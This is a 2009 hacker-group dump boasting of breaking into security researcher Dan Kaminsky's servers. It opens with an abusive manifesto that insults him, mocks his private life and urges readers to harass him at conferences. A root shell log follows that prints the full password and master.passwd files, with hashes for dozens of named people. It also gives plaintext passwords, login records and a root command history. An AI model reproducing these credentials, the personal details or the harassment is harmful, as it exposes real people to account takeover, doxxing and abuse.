secure or not. Sometimes there are superficial benefits, sometimes there
aren't. How do you convince the customer that they are more ZF0-safe than
before, if they were never targetted and probably never will be? And you all
lack the legitimacy to really do the job you should anyways. We can only expose
so many frauds, the rest of you can pretend you have changed something.

Very few whitehats actually go out there and provide a service where they make
people more secure. Not just for a day or a month. Are you genuinely fixing the
underlying design and logic flaws that generate security problems for your
clients or customers? If you actually clean up every exposed security flaw they
have, will they still be "secure" in six months or a year?

We could go on. Just in general, the industry is failing. Flat out failing.  

You cannot even protect yourselves.


                                           |
                                       \       /            _\/_
   Dan Kaminsky                          .-'-.              //o\  _\/_
                                    --  /     \  --           |   /o\\
  ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~`
    Just as every cop is a criminal                                 |
      And all the sinners saints
        As heads is tails
          Just call me Lucifer
            'cause I'm in need of some restraint
              So if you meet me
                Have some courtesy
                  Have some sympathy, and some taste
                    Use all your well-learned politesse
                      Or I'll lay your soul to waste


     !~~~~~~~~~~~~~~~~~~ Dan Kaminsky 0wned to Fuck ~~~~~~~~~~~~~~~~~~!

                 !~~~~~~~~~~ Table of Contents ~~~~~~~~~~!

                          1. mail.doxpara.com
                          2. backend.doxpara.com
                          3. attacker.doxpara.com
                          4. www.doxpara.com
                          5. Select spools 2005-2009
                          6. Select gmail
                          7. Select twitter

Dan Kaminsky is a noob. This guy does not know the first thing about
security. His boxes were a crazy combination of half-updated shit, half-
removed shit, half-installed shit, half-configured shit. The lack of things
working properly actually blocked a bit of 0day. But Dan, do not go selling
that as some kind of advanced defense - you provided us with plenty of local
holes to exploit and root.

Dan is a selfish jerkoff who is hated by the security industry and the
underground alike. He's fat and ugly in a way that only Gadi Evron could
love. Is that hairy ass picture yours or ccg's? Do we want to know?

When Dan made a huge stink about DNS flaws about a year ago (July 2008) we
knew we had to own him sooner or later. So we did. Him and his little 
whitehat bitch friends too.

Dan cannot even administer a box, let alone preach security. He lacks all
real legitimacy because he only hunts for flashy bugs that he can turn into
a big story. This guy would be the least important character in any real
security organization, the fatass past his prime (did Dan have a prime?)
who obsesses over areas that no-one else wants to touch just so he can
find a niche and avoid getting let go.

spender puts this nicely:

< dan_kam> LS -AL 0DAYZ/
< dan_kam> LS -AL 0DAYZ/
< spender> dns1.c
< spender> dns2.c
< spender> dns3.c
< spender> dns4.c
< spender> dns5.c
< spender> dns6.c
< spender> dns7.c
< dan_kam> grsux.c
< spender> dns8.c
< spender> dns9.c
< dan_kam> stab_spender.c

We hacked Dan's assets first through finding bugs and writing 0day, and
then through abusing him giving away passwords and his silly password
scheme. Check out just some of his passes:

fuck.hackers, 0hn0z (root account on his mail box), fuck.omg, fuck.vps, 
ohhai

Five character root password? Niiiiiiice.

From .mysql_history: 
SET PASSWORD FOR 'root'@'localhost' = PASSWORD('fuck.mysql');

See the pattern?

Adding fuel to the fire (and hopefully flames to his talks!), Dan has
a messy personal life involving him, his girlfriend, and other girls who
he would love to get with. For once, we are mostly sparing the girlfriend.
Who says chivalry is dead? But we'll still point out the dating torrents
that Kaminsky downloads.

Will people please troll Dan at BHB and Defcon? Basically anybody with
the loosest affiliation to ZF0 doesn't want to do it for obvious reasons.
So we need everyone else to. Ask questions. Ask him how he feels about
being a security researcher while hackers can read his most private
messages. While we can keep up on any "work" he is doing. While we can
monitor whitehat communications through individual emails and mailing
lists that he is a part of. How we've read every emo conversation
between him and ccg. Ask him what the fuck he is doing standing before
you as a lecturer.

Remember, anyone *not* trolling Dan must be ZF0. You don't want to be
accused of such a thing, do you? So put your hands up!

The hax logs of Dan's bounces run about 8000 lines, so that's the number
to skip if you don't want to read them.


                 !~~~~~~~~~~ mail.doxpara.com ~~~~~~~~~~!

Password: 
Last login: Mon Jun 29 10:00:45 2009 from cpe-72-225-172-
FreeBSD 7.0-STABLE (GENERIC) #0: Mon Jul 28 18:18:06 PDT 2008

********************************************************************************
********************************************************************************
OS Update to BSD 7.0 is complete.  Email is up, procmail is up.
Apache and MySQL are up and all websites seem to operating normally.
Still patching a few more apps but things are good to go....
********************************************************************************
********************************************************************************
Any questions, let me know (pmauvais@gmail.com).
%uname -a; id
FreeBSD livingend.org 7.0-STABLE FreeBSD 7.0-STABLE #0: Mon Jul 28 18:18:06 PDT 
2008 psm@pmjm.com:/usr/obj/usr/src/sys/GENERIC  i386
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
%cat /etc/passwd /etc/master.passwd
# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
admin:*:1001:0:User &:/home/admin:/bin/sh
ice:*:1000:1000:Eric Hampshire:/home/ice:/usr/local/bin/bash
effugas:*:3000:1007:Dan Kaminsky:/home/effugas:/usr/local/bin/bash
effugas_nr:*:0:1009:effugas_nr:/home/effugas_nr:/usr/local/bin/bash
psm:*:1002:1002:Paul S. Mauvais:/home/psm:/bin/tcsh
jmondala:*:1004:1004:Jayson Mondala:/home/jmondala:/bin/tcsh
mysql:*:88:88:MySQL Daemon:/var/db/mysql:/sbin/nologin
gir:*:1005:1005:ssj:/home/gir:/sbin/nologin
mooseaccess:*:1007:1005:roomwithamoose.com staff access account: /home/mooseaccess:/usr/local/bin/bash
jb:*:0:0:Jay "Ask DanK" Beale:/home/jb:/sbin/nologin
jay:*:1008:1008:Jay Non-priv user:/home/jay:/sbin/nologin
squid:*:100:100:squid caching-proxy pseudo user:/usr/local/squid:/sbin/nologin
cyrus:*:60:60:the cyrus mail server:/nonexistent:/sbin/nologin
karin:*:1010:1010:Karin Olefsky:/home/karin:/sbin/nologin
hampshir:*:1011:1011:Linda Hampshire:/home/hampshir:/sbin/nologin
andyw:*:1012:1012:Andy Washburn:/home/andyw:/sbin/nologin
ginray:*:1013:1013:Ray Hampshire:/home/ginray:/sbin/nologin
jcrossley:*:1014:1014:Josh Crossley:/home/jcrossley:/sbin/nologin
dire:*:1015:1015:Dire:/home/dire:/usr/local/bin/bash
tom:*:1017:1017:Tom:/home/tom:/sbin/nologin
dante:*:1018:1018:Dante Fontana:/home/dante:/sbin/nologin
tomstdenis:*:1019:1019:Tom St. Denis:/home/tomstdenis:/sbin/nologin
pig:*:1020:1020:Piggy:/home/pig:/sbin/nologin
spamd:*:58:58:SpamAssassin user:/var/spool/spamd:/sbin/nologin
bmondala:*:1021:1021:Byron Mondala:/home/bmondala:/usr/local/bin/bash
jeff:*:3001:3001:Jeff (andy's roommate):/home/jeff:/sbin/nologin
jaymi:*:3002:3002:Jaymi:/home/jaymi:/usr/local/bin/bash
dmktest:*:3003:3003:QUick IMAP testing acct:/home/dmktest:/bin/sh
clamav:*:106:106:Clam Antivirus:/nonexistent:/sbin/nologin
courier:*:465:465:Courier Mail System:/var/spool/courier:/sbin/nologin
dovecot:*:3005:3005:Dovecot:/nonexistent:/sbin/nologin
bre:*:3007:3007:Bre Pettis (friend of DanK):/home/bre:/usr/local/bin/bash
messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
jenicole:*:3009:3009:Jenifer Hendersen:/home/jenicole:/usr/local/bin/bash
ventrilo:*:3010:3010:Vent Server:/home/ventrilo:/usr/local/bin/bash
teamspeak:*:3011:3011:Teamspeak Server:/usr/local/lib/teamspeak_server:/bin/sh
crystal:*:3012:3012:Crystal Williams (GF of DanK):/home/crystal:/bin/sh
dakami:*:3013:3013:Dan Kaminsky:/home/dakami:/bin/sh
d:*:3014:3014:Dan Kaminsky:/home/d:/bin/sh
# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
#
root:$1$i/Ie/wCS$.KOSeZEDN6CA3yMkZneps1:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
admin:$1$Up9Pvs8P$PbxBZLtazl6ALXEB/4Rjl0:1001:0::0:0:User &:/home/admin:/bin/sh
ice:$1$PD3B0JSg$lZdr6qbdsyw/l8nCfGemd0:1000:1000::0:0:Eric Hampshire:/home/ice:/usr/local/bin/bash
effugas:$1$oZvjMVSM$Jty9wZ8MrctQi7ng/0DW0/:3000:1007::0:0:Dan Kaminsky:/home/effugas:/usr/local/bin/bash
effugas_nr:$1$cpg5LHyh$ux6kFuzVbz9va5tVyr6zd1:0:1009::0:0:effugas_nr:/home/effugas_nr:/usr/local/bin/bash
psm:oEebFXfhgTUEU:1002:1002::0:0:Paul S. Mauvais:/home/psm:/bin/tcsh
jmondala:$1$oQCOHp1q$aysrD4rV2Qrm7lWFNXQGa1:1004:1004::0:0:Jayson Mondala:/home/jmondala:/bin/tcsh
mysql:*:88:88::0:0:MySQL Daemon:/var/db/mysql:/sbin/nologin
gir:$1$Lo2YVL9E$kP2JMg5t4LiLm.LZKxH4e/:1005:1005::0:0:ssj:/home/gir:/sbin/nologin
mooseaccess:$1$YPhnYQUw$H9iKhq26emThSps7P7BR1.:1007:1005::0:0:roomwithamoose.com staff access account:/home/mooseaccess:/usr/local/bin/bash
jb:$1$euM6Ur7n$sOwNVjRzwpTlkAKlB9rmg.:0:0::0:0:Jay "Ask DanK" Beale:/home/jb:/sbin/nologin
jay:$1$o/rJ4n66$Er4Kwz.vLylWyNEfv3UkI.:1008:1008::0:0:Jay Non-priv user:/home/jay:/sbin/nologin
squid:*:100:100::0:0:squid caching-proxy pseudo user:/usr/local/squid:/sbin/nologin
cyrus:*:60:60::1126162800:0:the cyrus mail server:/nonexistent:/sbin/nologin
karin:$1$sJNV5vfc$J4kqjoz6rWyAFMgRVhECJ1:1010:1010::0:0:Karin Olefsky:/home/karin:/sbin/nologin
hampshir:$1$v.VtMVw2$y9O801Dd1xRZElRdwjGNu/:1011:1011::0:0:Linda Hampshire:/home/hampshir:/sbin/nologin
andyw:$1$AHYmVj/z$WXl4jphDfetCvnxhgXPEl/:1012:1012::0:0:Andy Washburn:/home/andyw:/sbin/nologin
ginray:$1$kxnbMdrw$PYqmfzO2hKLCuxGCoC/r6/:1013:1013::0:0:Ray Hampshire:/home/ginray:/sbin/nologin
jcrossley:$1$8eqfPvQ5$eFJb/ahpcDwWxM2qx8Q98.:1014:1014::0:0:Josh Crossley:/home/jcrossley:/sbin/nologin
dire:oZhmaPbAXAn6A:1015:1015::0:0:Dire:/home/dire:/usr/local/bin/bash
tom:$1$ZLuPUB8/$3TT37qMyOkMHsgiY4unSX0:1017:1017::0:0:Tom:/home/tom:/sbin/nologin
dante:$1$Q7jW/HjA$HFqQtTYlGbei8PXk.VdYq.:1018:1018::0:0:Dante Fontana:/home/dante:/sbin/nologin
tomstdenis:$1$cTlcgI43$88XYWP8iWCGOeA4GVLKmQ0:1019:1019::0:0:Tom St. Denis:/home/tomstdenis:/sbin/nologin
pig:$1$xvJADnU6$Vs1QxYM6.Y4A1Iwac.6bN.:1020:1020::0:0:Piggy:/home/pig:/sbin/nologin
spamd:*:58:58::0:0:SpamAssassin user:/var/spool/spamd:/sbin/nologin
bmondala:$1$iQVmQMD9$0cFAyR0lb20e4sKGCmGdI/:1021:1021::0:0:Byron Mondala:/home/bmondala:/usr/local/bin/bash
jeff:$1$8L.vlF4X$Tbx/beOvwQ0NekpNk/taG1:3001:3001::0:0:Jeff (andy's roommate):/home/jeff:/sbin/nologin
jaymi:$1$UUvdCblj$BPQTleL9/8wabAlbhPZSa1:3002:3002::0:0:Jaymi:/home/jaymi:/usr/local/bin/bash
dmktest:$1$cuiENSK6$mbM/rhy2GLgurExfekIZY1:3003:3003::0:0:QUick IMAP testing acct:/home/dmktest:/bin/sh
clamav:*:106:106::0:0:Clam Antivirus:/nonexistent:/sbin/nologin
courier:*:465:465::0:0:Courier Mail System:/var/spool/courier:/sbin/nologin
dovecot:*:3005:3005::0:0:Dovecot:/nonexistent:/sbin/nologin
bre:$1$UME.X.Kz$iV61uueELXhDl/yRmszNM1:3007:3007::0:0:Bre Pettis (friend of DanK):/home/bre:/usr/local/bin/bash
messagebus:*:556:556::0:0:D-BUS Daemon User:/nonexistent:/sbin/nologin
jenicole:$1$MUi4DG.2$WhZSeodaU236IUTRVi8/X.:3009:3009::0:0:Jenifer Hendersen:/home/jenicole:/usr/local/bin/bash
ventrilo:$1$xuRLxmKF$rFFr1KAraOSjQXdmnSDU31:3010:3010::0:0:Vent Server:/home/ventrilo:/usr/local/bin/bash
teamspeak:*:3011:3011::0:0:Teamspeak Server:/usr/local/lib/teamspeak_server:/bin/sh
crystal:$1$yzGs4j41$G8O47AhlS1X.ddcHK/zKi0:3012:3012::0:0:Crystal Williams (GF of DanK):/home/crystal:/bin/sh
dakami:$1$muEpUjpN$u8sKOctH93SLnRgltDXMA/:3013:3013::0:0:Dan Kaminsky:/home/dakami:/bin/sh
d:$1$nPgifnIS$1gWRCmi3UVXuDNb3QDMRh1:3014:3014::0:0:Dan Kaminsky:/home/d:/bin/sh
%w
 8:35AM  up 75 days, 11:44, 1 user, load averages: 0.05, 0.09, 0.08
USER             TTY      FROM              LOGIN@  IDLE WHAT
crystal          p0       76.14.85.220      6:47AM  1:48 sleep 60
%last -n 20
crystal          ttyp0    76.14.85.220     Mon Jul 20 06:47   still logged in
crystal          ttyp0    76.14.85.220     Sun Jul 19 17:55 - 19:42  (01:46)
jmondala         ttyp0    m208-54.dsl.rawb Sun Jul 19 10:16 - 17:19  (07:03)
effugas          ttyp0    125-225-67-230.d Fri Jul 17 11:37 - 06:18  (18:40)
crystal          ttyp0    70-7-125-81.pool Fri Jul 17 08:15 - 11:19  (03:04)
jmondala         ttyp0    128-107-239-233. Thu Jul 16 22:44 - 07:27  (08:42)
jmondala         ttyp5    128-107-239-233. Thu Jul 16 11:29 - 13:43  (02:14)
jmondala         ttyp4    m208-54.dsl.rawb Thu Jul 16 11:27 - 13:44  (02:16)
crystal          ttyp0    76.14.85.220     Thu Jul 16 07:59 - 13:06  (05:06)
jmondala         ttyp4    dhcp-171-70-239- Wed Jul 15 17:58 - 21:22  (03:24)
crystal          ttyp0    76.14.85.220     Wed Jul 15 08:01 - 19:34  (11:33)
crystal          ttyp0    76.14.85.220     Tue Jul 14 22:28 - 01:50  (03:21)
crystal          ttyp0    72-62-116-68.poo Tue Jul 14 14:51 - 17:58  (03:06)
effugas          ttyp0    125-225-68-165.d Tue Jul 14 07:57 - 10:12  (02:14)
crystal          ttyp0    76.14.85.220     Tue Jul 14 06:03 - 07:13  (01:09)
crystal          ttyp0    68-27-9-22.pools Mon Jul 13 18:33 - 23:30  (04:57)
psm              ttyp4    128-107-239-233. Mon Jul 13 13:35 - 15:34  (01:58)
crystal          ttyp0    70-1-246-110.poo Mon Jul 13 12:43 - 17:00  (04:17)
effugas          ttyp0    125-225-68-165.d Mon Jul 13 11:47 - 11:54  (00:07)
effugas          ttyp7    125-225-68-165.d Mon Jul 13 10:52 - 12:48  (01:55)
%cd /root
%ls -la
total 1016
drwxr-xr-x   7 root  wheel    1024 May 10 07:08 .
drwxr-xr-x  22 root  wheel    1024 May  5 20:47 ..
-rw-------   1 root  wheel     108 Sep 28  2006 .Xauthority
-rw-------   1 root  wheel    8791 Jun 29 06:47 .bash_history
-rw-r--r--   1 root  wheel     789 Oct  3  2006 .bashrc
drwxr-xr-x   5 root  wheel     512 Sep  4  2007 .bittorrent
-rw-r--r--   2 root  wheel     786 Jul 22  2008 .cshrc
-rw-------   1 root  wheel    2217 Jul 13 15:34 .history
-rw-r--r--   1 root  wheel     143 Nov  3  2005 .k5login
-rw-------   1 root  wheel     174 Feb 17 16:02 .lesshst
-rw-r--r--   1 root  wheel     293 Nov  3  2005 .login
-rw-------   1 root  wheel    1396 Sep  5  2008 .lsof_pmjm
-rw-------   1 root  wheel    5872 May 10 07:08 .mysql_history
-rw-r--r--   2 root  wheel     253 Jul 22  2008 .profile
-rw-------   1 root  wheel    1024 Feb 17 16:05 .rnd
drwx------   2 root  wheel     512 Nov  6  2008 .ssh
-rw-r--r--   1 root  wheel   36086 Jul 24  2008 logo-thelivingend.gif
drwx------   2 root  wheel     512 Oct  9  2006 mail
-rw-r--r--   1 root  wheel      80 Jul 24  2008 modules.txt
-rw-r--r--   1 root  wheel   25008 Jul 22  2008 pkgs
-rw-r--r--   1 root  wheel   10380 Jul 22  2008 portmaster-list
-rw-r--r--   1 root  wheel      45 Jul 22  2008 ports-byhand
-rw-r--r--   1 root  wheel     811 Sep 14  2007 queue-by-email.pl
-rw-r--r--   1 root  wheel     811 Sep 14  2007 queue-by-from.pl
-rw-r--r--   1 root  wheel     815 Sep 14  2007 queue.pl
-rw-r--r--   1 root  wheel    1565 Sep 14  2007 remove-queue-by-email.pl
drwxr-xr-x   2 root  wheel     512 Jul  9  2008 ventrilo_srv
-rw-r--r--   1 root  wheel  148042 Nov 14  2008 ventrilo_srv-3.0.2-FreeBSD-i386.tar.gz
-rw-r--r--   1 root  wheel  208458 May 29  2008 ventrilo_srv-3.0.2-Linux-i386.tar.gz
drwxr-xr-x   2 500   500       512 Nov 19  2007 ventsrv
%cat .bash_history
grep rl /etc/dev*
vi /etc/devd.conf
cd /etc
grep lnc *
grep le *
grep le0 *
grep rl *
grep rl *|more
man dev
df
man devfs
vi /etc/devfs.rules
vi /etc/defaults/devfs.rules 
jobs
fgt
fg
ifconfig rl0
ifconfig lnc0
grep lnc *
grep lnc */*
grep lnc */*/*
grep lnc */*/*/*
grep lnc */*/*/*/*
sync
shutdown -r now
PATH=/bin:/usr/bin:/sbin:/usr/sbin; umask 022; unset TMOUT
set
cd /usr/src
make cleandir
cd /usr/adm
make update
pwd
pushd /sys/i386/conf/
ls
vi GENERIC
ls
unalias vi
vi GENERIC
grep COMPAT43 *
ls
fg
grep lnc *
ifconfig -a
grep rl *
ls
vi GENERIC
pwd
popd
mergemaster -p
cd /usr/adm &&
cd /usr/adm && make world-build kernel-build
pwd
/etc/rc.d/sendmail stop
ps -awux
/usr/local/etc/rc.d/sa-spamd stop
ps -auwx
ps -auwx|more
ps -auwx|grep send
make world-install kernel-install
ls /etc/rc.d/ike
rm -f /etc/rc.d/ike /etc/rc.d/pccard /etc/rc.d/pcvt /etc/rc.d/ramdisk
rm -f /etc/rc.d/ramdisk-own /etc/rc.d/usbd
pwd
make etc
make clean
w
sync
vi /etc/rc.conf
ls /dev/net/rl0
ls -l /dev/net/rl0
ls /dev
ls /etc
ls /etc/d*
grep rl /etc/dev*
vi /etc/devd.conf
cd /etc
grep lnc *
grep le *
grep le0 *
grep rl *
grep rl *|more
man dev
df
man devfs
vi /etc/devfs.rules
vi /etc/defaults/devfs.rules 
jobs
fgt
fg
ifconfig rl0
ifconfig lnc0
grep lnc *
grep lnc */*
grep lnc */*/*
grep lnc */*/*/*
grep lnc */*/*/*/*
sync
shutdown -r now
PATH=/bin:/usr/bin:/sbin:/usr/sbin; umask 022; unset TMOUT
( for dir in /bin /sbin /usr/bin /usr/sbin /usr/libexec /usr/libdata; do find $dir -mtime +2 -type f -xdev -print; find $dir -mtime +2 -type l -xdev -print; done ) >/tmp/remove
vi /tmp/remove 
unalias vi
vi /tmp/remove
which perl
whereis perl
ls -l /usr/bin/perl
ls -l /usr/local/bin/perl5.8.8 
mv /tmp/remove ~psm/remove-old1
( for dir in /lib /usr/lib; do find $dir -mtime +2 -type f -xdev -print; find $dir -mtime +2 -type l -xdev -print; done ) | grep -v /usr/lib/compat >/tmp/move
vi /tmp/move
for x in `cat /tmp/move`; do chflags noschg $x; mv $x /usr/lib/compat/; done
cd /usr/src; make BATCH_DELETE_OLD_FILES=YES delete-old delete-old-libs
w
w
shutdown -r now
ls
cd /home/ventrilo/
ls
grep vent ~/.bash_history 
vi ventrilo_srv.htm 
unalias vi
vi ventrilo_srv.htm 
ls
./ventrilo_srv -h
mv /root/ventsrv_bsd .
ls
cd ventsrv_bsd/
ls
cp ../ventrilo_srv.ini .
./ventrilo_srv 
cd /home/ventrilo/
ls
./ventrilo_srv &
grep ssj /etc/passwd 
vipw
vipw
vipw
passwd mouseaccess
passwd mooseaccess
cd /export/www/yourmom.sh
vi nerd.php3
vi nerd.php3
df -h
cd /var/log/
ls
ls -l
ls
rm httpd-access.log.122*
du -hs
df -h
cd -
vi nerd.php3
df -h
apachectl startssl
apachectl start
vipw
passwd mooseaccess
passwd mooseaccess
cd /home/
ls
vipw
mkdir mooseaccess
chown mooseaccess mooseaccess/
cd mooseaccess/
ln -s /export/www/roomwithamoose.com .
ls
ls -l
cd ventrilo_srv
ls
cd /home/ventrilo/
ls
./ventrilo_srv -h
wget http://www.ventrilo.com/dlprod.php?id=102
cd /root/
ls
cd ventrilo_srv
ls
cd ..
tar zxvf ventrilo_srv-3.0.2-FreeBSD-i386.tar.gz 
cd ventsrv/
ls
./ventrilo_srv 
top
df -h
cd /var/log/
ls
du -hs
ls -l
rm httpd-access.log.1226016000 
df -h
df -h
top
cd /export/www/roomwithamoose.com/vbulletin
ls
du -hs
rm forumbackup-01-*
rm forumbackup-0*
df -h
df -h
ls
ls ../vbulletin_archive/
cd ..
ls
cd backup
ls
cd ../backups/
ls
rm *
cd ../vbulletin
ls
mv forumbackup-1* ../backups/
df -h
top
cd /export/www/roomwithamoose.com/
ls
rm -rf vbulletin.bak/
cp -Rp vbulletin vbulletin.bak
rm -rf vbulletin.bak/
cp -Rp vbulletin vbulletin.bak
cd vbulletin
ls
cd install/
ls
mv install.php install.php.bak 
cd ../includes/
ls
diff config.php config.php.new 
cd /export/www/
cd yourmom.sh
ls
cd misc/
ls
ls
cd /home/ventrilo/
./ventrilo_status 
cd /export/www/yourmom.sh
vi nerd.php3
unalias vi
vi nerd.php3
cd /var/log/
ls
ls -al
rm httpd-access.log.1230*
rm httpd-access.log.1231*
df -h
rm httpd-access.log.1232*
df -h
ls
ls -al
cd ..
ls
cd mail
ls
du -hs
ls -al
cd jcrossley 
rm jcrossley 
touch jcrossley
chown jcrossley.jcrossley jcrossley 
chown jcrossley jcrossley 
chgrp jcrossley jcrossley 
ls -al
df -h
df -h
vi /etc/mail/aliases
unalias vi
vi /etc/mail/aliases
vi /etc/mail/virtusertable
cd /etc/mail
make
cd /var/mail
ls
ls -al
du -hs
df -h
cd ../log 
du -hs
cd -
ls
ls -al
cd ..
ls -al
df -h
ls backups/
ls spool/
ls db/
ls msgs/
vi /usr/local/etc/php.ini
unalias vi
vi /usr/local/etc/php.ini
apachectl graceful
ls
cd /export/www/
ls
ls -al
mkdir coreynewmanphoto.com
chown coreynewmanphoto.com dire
chown dire coreynewmanphoto.com
chmod -R 777 coreynewmanphoto.com/
cd coreynewmanphoto.com/
vi index.html
vi /usr/local/etc/apache22/httpd.conf
apachectl graceful
cd /home/dire/
ls
ls -al
ln -s coreynewmanphoto.com /export/www/coreynewmanphoto.com/
ls -l
cd /export/www/
ls
ls -al
cd -
ln -s /export/www/coreynewmanphoto.com/ coreynewmanphoto.com
ls -al
cd /home
ls
cd karin/
ls
cd /export/www/
ls
nslookup dreamhost.com
nslookup ns1.dreamhost.com
nslookup ns2.dreamhost.com
nslookup ns3.dreamhost.com
cd /home
ls
ls /export/www/
cd /export/www/
cd co
cd coreynewmanphoto.com/
ls
scp -r * dire@professorx.dreamhost.com:coreynewmanphoto.com/
scp -r * dire@professorx.dreamhost.com:
sftp dire@professorx.dreamhost.com
ls
ls -al
rm coreynewmanphoto.com 
ls
cd ../jayzendesigns.com/
ls
cd ../johnzentner.com/
ls
cd ../lovebugknits.com/
ls -al
cd LoveBug\ Site_files/
ls
cd ..
ls
tar cvf lovebug.tar LoveBug\ Site_files
cd /home/andyw/
ls
scp -r * andeverwash@professorx.dreamhost.com:
vi /etc/mail/virtusertable
unalias vi
vi /etc/mail/virtusertable
nslookup ns1.dreamhost.com
nslookup ns2.dreamhost.com
nslookup ns3.dreamhost.com
cd /export/www/yourmom.sh
ls
scp -r * ehampshire@professorx.dreamhost.com:yourmom.sh/
cat ~/.ssh/id_dsa.pub 
scp -r * ehampshire@professorx.dreamhost.com:yourmom.sh/
cd ../ehampshire.com/
scp -r * ehampshire@professorx.dreamhost.com:ehampshire.com/
cd ../lovebugknits.com/
ls
cd ../jayzendesigns.com/
ls
scp -r * jaymi@professorx.dreamhost.com:jayzendesigns.com/
scp -r * jaymi@professorx.dreamhost.com:jayzendesigns.com/
scp -r * jaymi@professorx.dreamhost.com:
sftp jaymi@professorx.dreamhost.com
cd ../lovebugknits.com/
ls
sftp jenicole@professorx.dreamhost.com
cd /home/ciagon/public_html/
ls
scp -r * ehampshire@professorx.dreamhost.com:yourmom.sh/ciagon/
cd ../../dante/pu
cd ../../dante/
ls
cd /export/www/norcalparties.com/
ls
sftp jcrossley2@professorx.dreamhost.com
mysql -u root -pfuck.mysql
mysql -u root -pfuck.mysql
df -h
cd /export/www/roomwithamoose.com/
ls
mysqldump --opt -Q -uroot -p vbulletin > vbulletin_db.sql
ls
cd closet
ls
cd ..
cd ..
ls
cd zim
ls
scp -r * ehampshire@professorx.dreamhost.com:roomwithamoose.com/
cd ../roomwithamoose.com 
ls
vi index.php 
unalias vi
cat index.php 
scp index.php ehampshire@professorx.dreamhost.com:roomwithamoose.com/
cd ../ehampshire.com/magic/
ls
cd ..
scp -r magic ehampshire@professorx.dreamhost.com:roomwithamoose.com/
top
cd /export/www/roomwithamoose.com/
scp -r * ehampshire@professorx.dreamhost.com:roomwithamoose.com/
cd /export/www/policethepolice.com
ls
cd ..
tar czvf policethepolice.com.tgz policethepolice.com
ln -s policethepolice.com.tgz /home/dire/
cd /home/dire/
ls -l
chmod 777 policethepolice.com.tgz 
rm policethepolice.com.tgz 
ln -s /export/www/policethepolice.com.tgz .
ls -l
chmod 777 policethepolice.com.tgz 
cd public_html/
ls
cd /export/www/coreynewmanphoto.com/
ls
cd ../policethepolice.com
ls
find . |grep counter
cd ..
ls
cd zim
ls
cd ../yourmom.sh 
ls
find . |grep counter
vi index.php3 
unalias vi
vi index.php3 
vi top.php3
vi bottom.php3 
cd ../policethepolice.com
ls
vi index.php.orig 
vi index.php
vi ../counter.php3 
mysqladmin -h
mysqladmin --help
mysqldump -h
mysqldump --help
mysqldump -uroot -pfuck.mysql counter > /tmp/counter_db.sql
vi /tmp/counter_db.sql 
mysql -u counter_db -p -h mysql.yourmom.sh yourmom_counter_db < /tmp/counter_db.sql 
mysql -u counter_db -p -h mysql.yourmom.sh yourmom_counter_db < /tmp/counter_db.sql 
mysql -u counter_db -p -h mysql.yourmom.sh yourmom_counter_db < /tmp/counter_db.sql 
scp /tmp/counter_db.sql ehampshire@professorx.dreamhost.com:
fg
cd ..
cp counter.php3 /home/dire/
cd /home/jaymi/public_html/photos/
ls
cd ..
tar zcvf jaymi_photos.tgz photos/
cd /export/www/
mkdir colo.pmjm.com
chmod 777 colo.pmjm.com/
cd colo.
cd colo.pmjm.com/
vi index.html
